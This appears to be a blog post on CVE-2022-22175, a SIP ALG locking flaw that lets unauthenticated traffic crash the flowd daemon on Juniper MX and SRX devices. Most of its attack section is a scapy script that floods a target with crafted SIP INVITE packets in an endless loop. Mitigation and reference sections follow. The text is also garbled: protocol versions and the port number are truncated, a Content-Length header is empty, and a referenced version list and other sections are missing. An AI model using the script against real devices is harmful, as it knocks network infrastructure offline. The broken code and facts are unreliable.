There’s a dangerous vulnerability lurking in certain versions of Juniper's Junos OS, specifically on MX Series and SRX Series devices. It's called CVE-2022-22175. By simply sending specially-crafted SIP packets, unauthenticated attackers on your network can crash the flow processing daemon (flowd), resulting in a full Denial of Service (DoS) on affected devices. If the attack is repeated, your box stays knocked out. This post breaks down the what, how, and why—using clear language and real code snippets.
What Is CVE-2022-22175?
CVE-2022-22175 is an Improper Locking vulnerability found in the SIP Application Level Gateway (ALG) of Junos OS. When certain SIP messages are processed simultaneously, and SIP ALG is enabled, the device’s flowd daemon can crash.
How Does the Attack Work?
When SIP ALG is turned on, the Junos flowd process inspects and rewrites SIP traffic passing through the device. If an attacker sends specific SIP messages at the same time, Junos doesn't properly manage system locks—leading to a crash. No authentication or privilege escalation is needed!
The result?
Every time these packets are sent, your router's network traffic is disrupted, services go down, and critical infrastructure is held hostage by denial of service.
2. Crafting the SIP Packets
Here's a sample Python script using the scapy library to send SIP packets. (This is a proof-of-concept, provided for educational and defensive purposes only.)
from scapy.all import *
import time
# Change these to match your network
JUNIPER_IP = "192.168.1.1"
SRC_IP = "192.168.1.100"
SIP_PORT = 506
# Sample malicious SIP INVITE message
sip_payload = (
'INVITE sip:bob@domain.com SIP/2.\r\n'
'Via: SIP/2./UDP attacker.example.com;branch=z9hG4bK776asdhds\r\n'
'Max-Forwards: 70\r\n'
'To: <sip:bob@domain.com>\r\n'
'From: <sip:alice@evil.com>;tag=1928301774\r\n'
'Call-ID: a84b4c76e66710@evil.com\r\n'
'CSeq: 314159 INVITE\r\n'
'Contact: <sip:alice@evil.com>\r\n'
'Content-Length: \r\n'
'\r\n'
)
# Flood device with packets
def attack():
pkt = IP(src=SRC_IP, dst=JUNIPER_IP) / UDP(sport=RandShort(), dport=SIP_PORT) / sip_payload
while True:
send(pkt, verbose=False)
time.sleep(.1) # Throttle packets to avoid overwhelming the network
if __name__ == '__main__':
attack()
3. Sending Simultaneous Messages
Multiple attackers (or just multiple threads) can send different types of SIP requests—like INVITE, BYE, and REGISTER at the same time—to maximize the likelihood of triggering the race condition in the SIP ALG handler.
`
Or view /var/log/messages for flowd errors.
Go to a safe version (see list above).
- Juniper download page (Customer account required)
Monitor your routers for crashes: Automate alerting on flowd restarts and core dumps.
Official Juniper Reference:
- JSA11269 Juniper Security Advisory
Other Resources
- NVD entry for CVE-2022-22175
- Understanding SIP ALG
Conclusion: Why Does This Matter?
This isn’t your average bug. With just a basic SIP packet generator and a little network access, any user can knock out critical network gear until you upgrade and protect your systems. If you use Juniper MX or SRX and run VoIP, check your versions and settings right now! Don’t be the next headline.
If you found this post helpful, please share and spread the word—there are still plenty of unpatched routers out there!
Stay safe and patch early.
*Questions or comments? Drop them below!*
Timeline
Published on: 01/19/2022 01:15:00 UTC
Last modified on: 01/26/2022 18:38:00 UTC